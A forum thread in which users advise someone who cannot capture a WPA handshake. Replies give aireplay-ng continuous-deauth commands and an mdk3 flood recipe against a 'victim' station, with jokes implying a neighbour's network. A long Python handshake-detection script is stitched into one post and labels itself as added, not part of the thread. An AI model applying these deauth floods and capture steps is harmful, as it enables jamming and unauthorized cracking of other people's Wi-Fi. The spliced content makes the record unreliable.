
Thread: Cant Deauth WPA STA for Handshake

  1. #1
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    10

    Default Cant Deauth WPA STA for Handshake

    I've been patient for several hours trying to deauth a station to get a handshake and have been unsuccessful. Maybe I'm not doing something correctly.

    The AP is WPA TKIP PSK and I have airodump-ng in a shell running exclusive to that AP channel, AP MAC and it shows a station connected.

    In another shell I run aireplay-ng -0 1 -a AP MAC -c STATION MAC <device>

    Several times I have sequenced aireplay-ng -0 10 and once -0 100

    I have tried aireplay -0 1 -a AP MAC <device> and see only 1 station.

    PWR Level is at 34, so I think I am getting signal to it.

    Any suggestions?

    I am using BT3b

    Thanks.

  2. #2
    Junior Member
    Join Date
    Jul 2007
    Posts
    47

    Default

    Hi,

    Remember that just because you are close enough to see the AP it does not always mean you are close enough to send data to a connected client.
    Removed by -=Xploitz=-
    We do NOT allow external links. We only allow "internal" links to our forums. See PM's.

  3. #3
    Senior Member imported_spankdidly's Avatar
    Join Date
    Feb 2006
    Posts
    1,031

    Default

    Yeah, try walking over to his house and sit on the front porch to do it, you will get a better signal that way.

  4. #4
    Just burned his ISO
    Join Date
    Dec 2007
    Posts
    10

    Default

    Then eventually the station would need to re-authorize, correct? For some reason or another, and if I was monitoring I'd get the handshake, correct?

    I'm using an Alpha 1/2 watt device. I think i should be able to get to the station...

  5. #5

    Default

    funny, cause I can't auth with the wpa AT HOME!

  6. #6
    Junior Member
    Join Date
    Feb 2006
    Posts
    75

    Default

    @ attitude,

    Try running aireplay-ng -0 0 -a AP MAC -c STATION MAC <device>

    That should continuously deauth; leave it running until you see you have a handshake in airodump. That's always worked for me at least. Also, like harry said, being close doesn't always mean you will be successful. I've been distant before with a very low power level and the weirdest thing... my USB optical mouse, when it was positioned just a certain way close to my wireless card, somehow made injection work. If I moved it away from my card injection stopped, but if I moved it closer and positioned it a certain way it worked just fine.

    Hope that helps some.
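    The step the advice above turns on is knowing whether the capture airodump-ng is writing actually holds a usable handshake, or whether the deauths are going out and the client never re-keys. Below is an added example, not code from the thread or from the aircrack-ng project: a pure-Python reader (no scapy) for a pcap of monitor-mode frames (link type 105, raw 802.11, or 127, radiotap) that reports which of the four EAPOL-Key messages it holds for one BSSID/station pair, and how many deauthentication frames it saw aimed at that pair. The MAC addresses, RSN IE and frames at the bottom are constructed for the self-test, and the "usable" rule (M2 plus either M1 or M3) is the script's own, as explained in the code.

```python
"""Check a monitor-mode capture for a WPA/WPA2 4-way handshake between one
BSSID and one station, and count the deauth frames aimed at that pair.
Added example, not from the thread or aircrack-ng; pure Python, no scapy.
The capture it checks itself against is constructed below, not recorded."""
import struct

KI_ACK, KI_MIC = 0x0080, 0x0100                 # EAPOL-Key "Key Information" bits
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def iter_frames(pcap):
    """Yield 802.11 frames from a little-endian pcap (link type 105 raw or 127 radiotap)."""
    magic, *_, link = struct.unpack_from("<IHHiIII", pcap, 0)
    if magic != 0xA1B2C3D4 or link not in (105, 127):
        raise ValueError("need a little-endian pcap of 802.11 or radiotap frames")
    off = 24
    while off + 16 <= len(pcap):
        incl = struct.unpack_from("<IIII", pcap, off)[2]
        rec = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        yield rec[struct.unpack_from("<H", rec, 2)[0]:] if link == 127 else rec


def parse_frame(f):
    """Classify a frame: ('deauth', a1, a2, a3, body) or ('data', bssid, sta, body)."""
    if len(f) < 24:
        return None
    fc0, fc1 = f[0], f[1]
    ftype, subtype = (fc0 >> 2) & 3, fc0 >> 4
    a1, a2, a3 = f[4:10], f[10:16], f[16:22]
    if ftype == 0 and subtype == 12:            # management / deauthentication
        return ("deauth", a1, a2, a3, f[24:])
    if ftype != 2 or fc1 & 0x40 or (fc1 & 3) == 3:   # not data, encrypted, or 4-address WDS
        return None
    body = f[24 + (2 if subtype & 8 else 0):]  # QoS data carries a 2-byte QoS control field
    if fc1 & 1:                                 # To DS: a1 = BSSID, a2 = station
        return ("data", a1, a2, body)
    if fc1 & 2:                                 # From DS: a1 = station, a2 = BSSID
        return ("data", a2, a1, body)
    return ("data", a3, a2, body)               # IBSS: a3 = BSSID, a2 = source


def eapol_message(body):
    """Return 1..4 for an EAPOL-Key handshake message, else None."""
    if body[:8] != LLC_SNAP_EAPOL or len(body) < 12 or body[9] != 3:   # type 3 = EAPOL-Key
        return None
    key = body[12:12 + struct.unpack_from(">H", body, 10)[0]]
    if len(key) < 95:                            # fixed part of the EAPOL-Key descriptor
        return None
    key_info = struct.unpack_from(">H", key, 1)[0]
    key_data_len = struct.unpack_from(">H", key, 93)[0]
    ack, mic = bool(key_info & KI_ACK), bool(key_info & KI_MIC)
    if ack:
        return 3 if mic else 1                   # AP -> STA: M1 (ANonce), M3 (ANonce + GTK + MIC)
    if mic:
        return 2 if key_data_len else 4          # STA -> AP: M2 carries the RSN/WPA IE, M4 has no key data
    return None


def handshake_status(pcap, bssid, sta):
    """Which handshake messages the capture holds for this pair, and deauths seen against it."""
    b, s = mac(bssid), mac(sta)
    seen, deauths = set(), 0
    for p in filter(None, map(parse_frame, iter_frames(pcap))):
        if p[0] == "deauth":
            if p[3] == b and s in (p[1], p[2]):  # BSSID matches, station is sender or receiver
                deauths += 1
        elif p[1] == b and p[2] == s:
            m = eapol_message(p[3])
            if m:
                seen.add(m)
    # M2 gives the SNonce and a MIC to test candidate PSKs against; M1 or M3 supplies the ANonce.
    return {"messages": sorted(seen), "deauths": deauths,
            "usable": 2 in seen and (1 in seen or 3 in seen)}


# --- constructed sample capture for the self-test (synthetic, not a real recording) ---
AP, STA, OTHER = "00:11:22:33:44:55", "66:77:88:99:aa:bb", "de:ad:be:ef:00:01"
RSN_IE = bytes.fromhex("30140100000fac020100000fac040100000fac020000")
RADIOTAP = struct.pack("<BBHI", 0, 0, 8, 0)     # minimal radiotap header, length 8


def _eapol_key(key_info, key_data=b""):
    key = b"\x02" + struct.pack(">HH", key_info, 16) + bytes(88) + struct.pack(">H", len(key_data)) + key_data
    return LLC_SNAP_EAPOL + b"\x02\x03" + struct.pack(">H", len(key)) + key


def _data(bssid, sta, to_ds, payload, qos=False):
    fc = bytes([0x88 if qos else 0x08, 0x01 if to_ds else 0x02])
    addrs = mac(bssid) + mac(sta) + mac(bssid) if to_ds else mac(sta) + mac(bssid) + mac(bssid)
    return fc + b"\x00\x00" + addrs + b"\x10\x00" + (b"\x00\x00" if qos else b"") + payload


def _deauth(bssid, sta):                         # spoofed AP -> STA, reason 7 (class 3 frame from non-associated STA)
    return b"\xc0\x00\x00\x00" + mac(sta) + mac(bssid) * 2 + b"\x20\x00" + struct.pack("<H", 7)


def sample_capture(full=True, radiotap=True):
    frames = [_deauth(AP, STA), _data(AP, STA, False, _eapol_key(0x008A))]           # M1
    if full:
        frames += [_data(AP, STA, True, _eapol_key(0x010A, RSN_IE), qos=True),       # M2
                   _data(AP, STA, False, _eapol_key(0x13CA, bytes(24))),             # M3
                   _data(AP, STA, True, _eapol_key(0x030A))]                         # M4
    frames.append(_data(AP, OTHER, False, _eapol_key(0x008A)))                       # M1 to another client
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 127 if radiotap else 105)
    for i, f in enumerate(frames):
        f = RADIOTAP + f if radiotap else f
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(f), len(f)) + f
    return out
```

    Point it at a real file with `handshake_status(open("capture-01.cap", "rb").read(), "<AP MAC>", "<STATION MAC>")`. A result with `deauths` climbing but `messages` stuck at `[]` or `[1]` means the frames are leaving your card but the client is not re-associating (out of range of your transmitter, or not actually associated any more); `[1, 2]` or `[2, 3]` is already enough to start attacking the PSK, and that is the point at which the running `aireplay-ng -0 0` can be stopped.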

  7. #7
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default

    I prefer a more tricky but effective way:

    create a blacklist file containing the MAC of the victim

    run an mdk3 deauth / amok flood

    adjust delay to 1

    adjust packets/burst to 500

    adjust speed to 1024

    before launching that, try to lower your rate to 1M, in order to get more clients when scanning

    this way, it's a continuous deauth EACH TIME THE CLIENT REQUESTS A SINGLE BIT OF TRAFFIC

    so you get the handshake for sure, but it needs (a little) more work

    this function will be available in ezpawn and is available in charon, my GUIs which hold some mdk3 functions (charon holds all)
